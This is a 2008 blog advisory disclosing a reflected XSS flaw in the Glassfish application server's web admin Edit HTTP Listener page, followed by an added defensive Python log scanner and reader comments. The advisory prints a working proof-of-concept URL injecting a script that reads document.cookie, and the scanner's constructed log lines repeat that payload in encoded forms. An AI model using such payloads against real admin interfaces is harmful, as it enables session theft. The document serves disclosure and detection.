XSS – Glassfish Web Admin Interface (Sun Java System Application
Well, gentlemen, this is yet another one inside an administration interface. One more input validation problem 🙂
Cheers! 🙂
==============================
XSS – Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 10 June 2008
Site: https://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Description:
This vulnerability was found in the Edit HTTP Listener section of the
Glassfish web admin interface.
This is a vulnerable URL:
http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config
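
Added example, not part of the original advisory or of Glassfish code: a defender-side check that scans web access logs for requests to httpListenerEdit.jsf whose name parameter is not a plain listener name, and shows the HTML-escaped form the page should emit instead of the raw value. Assumptions: combined-format log lines (the three below are constructed), and an allow-list of letters, digits, '-', '_' and '.' for listener names.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: listener names only need letters, digits, '-', '_' and '.'.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")
TARGET_PATH = "/configuration/httpListenerEdit.jsf"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_names(log_line):
    """Return the decoded 'name' values in this request that fail the allow-list."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != TARGET_PATH:
        return []
    names = parse_qs(url.query, keep_blank_values=True).get("name", [])
    return [n for n in map(decode_fully, names) if not SAFE_NAME.fullmatch(n)]

def render_name(name):
    """What the page should emit: the value HTML-escaped, never raw."""
    return html.escape(name, quote=True)

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - admin [10/Jun/2008:10:00:01 +0000] "GET /configuration/httpListenerEdit.jsf?name=http-listener-1&configName=server-config HTTP/1.1" 200 5120',
    '10.0.0.9 - admin [10/Jun/2008:10:02:17 +0000] "GET /configuration/httpListenerEdit.jsf?name=%3Cscript%3Ealert(document.cookie);%3C/script%3E&configName=server-config HTTP/1.1" 200 5344',
    '10.0.0.9 - admin [10/Jun/2008:10:02:40 +0000] "GET /configuration/httpListenerEdit.jsf?name=%253Cscript%253Ex%253C/script%253E&configName=server-config HTTP/1.1" 200 5301',
]

def scan(lines):
    """Yield (line_number, escaped_value) for every flagged request."""
    for i, line in enumerate(lines, 1):
        for bad in suspicious_names(line):
            yield i, render_name(bad)

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: rejected name = {value}")
```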
AAEAEAEA…… nice one!! +1 duuuuu
You're the man!!! lol… Big hug, Eduardo! 🙂
Larcher's comment doesn't count. He's Dudu's number one fan.
hehehehe